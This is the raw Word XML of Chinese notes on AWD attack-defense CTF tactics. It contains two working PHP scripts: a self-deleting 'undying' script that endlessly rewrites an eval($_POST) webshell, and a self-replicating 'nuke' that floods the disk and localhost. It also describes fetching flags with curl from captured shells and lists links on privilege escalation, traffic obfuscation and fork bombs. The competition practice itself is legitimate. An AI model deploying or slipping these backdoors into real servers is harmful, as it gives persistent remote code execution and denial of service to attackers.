    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="102" w:name="8930-1541314765368"/>
      <w:bookmarkEnd w:id="102"/>
      <w:r>
        <w:t>1.当getshell到后该怎么办，创建多几个后门，隐藏后门，放个不死马</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="103" w:name="1013-1541314988410"/>
      <w:bookmarkEnd w:id="103"/>
      <w:r>
        <w:t>&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="104" w:name="5000-1541314988410"/>
      <w:bookmarkEnd w:id="104"/>
      <w:r>
        <w:t xml:space="preserve">    set_time_limit(0);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="105" w:name="1360-1541314988410"/>
      <w:bookmarkEnd w:id="105"/>
      <w:r>
        <w:t xml:space="preserve">    ignore_user_abort(1);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="106" w:name="4251-1541314988410"/>
      <w:bookmarkEnd w:id="106"/>
      <w:r>
        <w:t xml:space="preserve">    unlink(__FILE__);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="107" w:name="8210-1541314988410"/>
      <w:bookmarkEnd w:id="107"/>
      <w:r>
        <w:t xml:space="preserve">    //file_put_contents(__FILE__,'');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="108" w:name="2212-1541314988410"/>
      <w:bookmarkEnd w:id="108"/>
      <w:r>
        <w:t xml:space="preserve">    while(1){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00E42467">
      <w:bookmarkStart w:id="109" w:name="6412-1541314988410"/>
      <w:bookmarkEnd w:id="109"/>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="110" w:name="6961-1541314988410"/>
      <w:bookmarkEnd w:id="110"/>
      <w:r>
        <w:t xml:space="preserve">        file_put_contents('path/webshell.php','&lt;?php     @eval($_POST["password"]);?&gt;');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="111" w:name="1035-1541314988410"/>
      <w:bookmarkEnd w:id="111"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="112" w:name="2298-1541314988410"/>
      <w:bookmarkEnd w:id="112"/>
      <w:r>
        <w:t>?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00E42467">
      <w:bookmarkStart w:id="113" w:name="6450-1541314988410"/>
      <w:bookmarkEnd w:id="113"/>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="114" w:name="4010-1541314988410"/>
      <w:bookmarkEnd w:id="114"/>
      <w:r>
        <w:t>2.搅屎核弹</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="115" w:name="4580-1541314988410"/>
      <w:bookmarkEnd w:id="115"/>
      <w:r>
        <w:t>&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="116" w:name="6663-1541314988410"/>
      <w:bookmarkEnd w:id="116"/>
      <w:r>
        <w:t xml:space="preserve">    set_time_limit(0);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="117" w:name="4970-1541314988410"/>
      <w:bookmarkEnd w:id="117"/>
      <w:r>
        <w:t xml:space="preserve">    ignore_user_abort(true);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="118" w:name="9096-1541314988410"/>
      <w:bookmarkEnd w:id="118"/>
      <w:r>
        <w:t xml:space="preserve">    while(1){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="119" w:name="9699-1541314988410"/>
      <w:bookmarkEnd w:id="119"/>
      <w:r>
        <w:t xml:space="preserve">        file_put_contents(randstr().'.php',file_get_content(__FILE__));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="120" w:name="1141-1541314988410"/>
      <w:bookmarkEnd w:id="120"/>
      <w:r>
        <w:t xml:space="preserve">        file_get_contents("http://127.0.0.1/");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="121" w:name="1269-1541314988410"/>
      <w:bookmarkEnd w:id="121"/>
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="122" w:name="8587-1541314988410"/>
      <w:bookmarkEnd w:id="122"/>
      <w:r>
        <w:t>?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="123" w:name="8888-1541314988410"/>
      <w:bookmarkEnd w:id="123"/>
      <w:r>
        <w:t>详细文章：https://www.freebuf.com/articles/web/118149.html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00E42467">
      <w:bookmarkStart w:id="124" w:name="8199-1541314988410"/>
      <w:bookmarkEnd w:id="124"/>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="125" w:name="8828-1541313530455"/>
      <w:bookmarkEnd w:id="125"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="555555"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>比赛中获取flag一般有两种模式：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="126" w:name="3554-1541313530455"/>
      <w:bookmarkEnd w:id="126"/>
      <w:r>
        <w:rPr>
          <w:color w:val="555555"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>* flag在靶机根目录或家目录下，读取flag内容，提交即可得分</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="127" w:name="6410-1541313530455"/>
      <w:bookmarkEnd w:id="127"/>
      <w:r>
        <w:rPr>
          <w:color w:val="555555"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>* 拿到其他队伍shell后，执行指定命令（curl 10.0.0.2），即可从上图中flag机获取flag内容</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00E42467">
      <w:bookmarkStart w:id="128" w:name="3682-1541312395276"/>
      <w:bookmarkEnd w:id="128"/>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00E42467">
      <w:bookmarkStart w:id="129" w:name="6773-1541312395434"/>
      <w:bookmarkEnd w:id="129"/>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="130" w:name="8572-1541312395582"/>
      <w:bookmarkEnd w:id="130"/>
      <w:r>
        <w:t>文章推荐</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="131" w:name="3421-1541314186640"/>
      <w:bookmarkEnd w:id="131"/>
      <w:r>
        <w:t xml:space="preserve">1.提权+防御 </w:t>
      </w:r>
      <w:hyperlink r:id="rId6">
        <w:r>
          <w:rPr>
            <w:color w:val="003884"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://blog.csdn.net/yatere/article/details/78861004</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="132" w:name="4251-1541314202533"/>
      <w:bookmarkEnd w:id="132"/>
      <w:r>
        <w:rPr>
          <w:color w:val="393939"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:t>在awd攻防中搅出屎：https://www.freebuf.com/articles/web/118149.html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="133" w:name="5760-1541315027855"/>
      <w:bookmarkEnd w:id="133"/>
      <w:r>
        <w:t>3.awd攻防总结：https://xz.aliyun.com/t/25</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="134" w:name="6061-1541315027855"/>
      <w:bookmarkEnd w:id="134"/>
      <w:r>
        <w:t>4.Linux通过可写文件获取root权限:http://www.hackingarticles.in/multiple-ways-to-get-root-through-writable-file/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="135" w:name="7355-1541315027855"/>
      <w:bookmarkEnd w:id="135"/>
      <w:r>
        <w:t>5.LInux内核查询提权：https://github.com/SecWiki/linux-kernel-exploits/blob/master/README.md</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="136" w:name="1074-1541315027855"/>
      <w:bookmarkEnd w:id="136"/>
      <w:r>
        <w:t>6.Linux后渗透权限指南：https://gtfobins.github.io/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="137" w:name="2593-1541312395734"/>
      <w:bookmarkEnd w:id="137"/>
      <w:r>
        <w:t>7.AWD流量混淆之道：</w:t>
      </w:r>
      <w:hyperlink r:id="rId7">
        <w:r>
          <w:rPr>
            <w:color w:val="003884"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://cloud.tencent.com/developer/news/321173</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="138" w:name="4574-1541315095292"/>
      <w:bookmarkEnd w:id="138"/>
      <w:r>
        <w:t>8.经典的 Fork 炸弹解析：</w:t>
      </w:r>
      <w:hyperlink r:id="rId8">
        <w:r>
          <w:rPr>
            <w:color w:val="003884"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>http://blog.jobbole.com/111319/?tdsourcetag=s_pctim_aiomsg</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="139" w:name="6498-1541312396043"/>
      <w:bookmarkEnd w:id="139"/>
      <w:r>
        <w:t>9.博客：</w:t>
      </w:r>
      <w:hyperlink r:id="rId9">
        <w:r>
          <w:rPr>
            <w:color w:val="003884"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>http://www.hackingarticles.in/category/penetration-testing/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="140" w:name="9260-1541312396190"/>
      <w:bookmarkEnd w:id="140"/>
      <w:r>
        <w:rPr>
          <w:color w:val="393939"/>
        </w:rPr>
        <w:t>10.</w:t>
      </w:r>
      <w:r>
        <w:t>Linux绕过本地安全策略防御:</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="141" w:name="1000-1541315274680"/>
    <w:bookmarkEnd w:id="141"/>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:r>
        <w:rPr>
          <w:color w:val="003884"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="003884"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "https://422926799.github.io/2018/11/03/Linux%E7%BB%95%E8%BF%87%E6%9C%AC%E5%9C%B0%E5%AE%89%E5%85%A8%E7%AD%96%E7%95%A5%E9%98%B2%E5%BE%A1/" \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="003884"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="003884"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>https://422926799.github.io/2018/11/03/Linux%E7%BB%95%E8%BF%87%E6%9C%AC%E5%9C%B0%E5%AE%89%E5%85%A8%E7%AD%96%E7%95%A5%E9%98%B2%E5%BE%A1/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="003884"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="142" w:name="8583-1541315284445"/>
      <w:bookmarkEnd w:id="142"/>
      <w:r>
        <w:t>11.RCE通过上传web.config：https://poc-server.com/blog/2018/05/22/rce-by-uploading-a-web-config/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:bookmarkStart w:id="143" w:name="1998-1541312396332"/>
      <w:bookmarkEnd w:id="143"/>
      <w:r>
        <w:t>12.专门Linux提权的github项目：</w:t>
      </w:r>
      <w:hyperlink r:id="rId10">
        <w:r>
          <w:rPr>
            <w:color w:val="003884"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://gtfobins.github.io/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00E42467" w:rsidRDefault="00D276A5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="144" w:name="1625-1541315438121"/>
      <w:bookmarkEnd w:id="144"/>
      <w:r>
        <w:t xml:space="preserve">13.Linux提权：从入门到放弃 </w:t>
      </w:r>
      <w:hyperlink r:id="rId11">
        <w:r>
          <w:rPr>
            <w:color w:val="003884"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://www.cnblogs.com/hookjoy/p/6612595.html?tdsourcetag=s_pctim_aiomsg</w:t>
        </w:r>
      </w:hyperlink>
      <w:bookmarkStart w:id="145" w:name="3477-1541315487601"/>
      <w:bookmarkStart w:id="146" w:name="2740-1541312396632"/>
      <w:bookmarkStart w:id="147" w:name="8747-1541312396781"/>
      <w:bookmarkStart w:id="148" w:name="1478-1541247791900"/>
      <w:bookmarkStart w:id="149" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="145"/>
      <w:bookmarkEnd w:id="146"/>
      <w:bookmarkEnd w:id="147"/>
      <w:bookmarkEnd w:id="148"/>
      <w:bookmarkEnd w:id="149"/>
    </w:p>
    <w:sectPr w:rsidR="00E424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0EF" w:rsidRDefault="004560EF" w:rsidP="00564CD3">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="004560EF" w:rsidRDefault="004560EF" w:rsidP="0056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0EF" w:rsidRDefault="004560EF" w:rsidP="00564CD3">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="004560EF" w:rsidRDefault="004560EF" w:rsidP="00564C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42467"/>
    <w:rsid w:val="001E5C0B"/>
    <w:rsid w:val="004560EF"/>
    <w:rsid w:val="00564CD3"/>
    <w:rsid w:val="00D276A5"/>
    <w:rsid w:val="00E42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0E733"/>
  <w15:docId w15:val="{2A92FF1B-DE6F-49FD-A5B9-EF6C25D2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header"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="a8"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00564CD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64CD3"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a9">
    <w:name w:val="footer"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="aa"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00564CD3"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4153"/>
        <w:tab w:val="right" w:pos="8306"/>
      </w:tabs>
      <w:snapToGrid w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="aa">
    <w:name w:val="页脚 字符"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a9"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00564C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log.jobbole.com/111319/?tdsourcetag=s_pctim_aioms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loud.tencent.com/developer/news/32117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yatere/article/details/78861004" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cnblogs.com/hookjoy/p/6612595.html?tdsourcetag=s_pctim_aiomsg" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/endnotes" Target="endnotes.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gtfobins.github.io/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footnotes" Target="footnotes.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.hackingarticles.in/category/penetration-tes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windforce17</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-11-04T07:36:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-05-05T03:20:00Z</dcterms:modified>
</cp:coreProperties>
</file>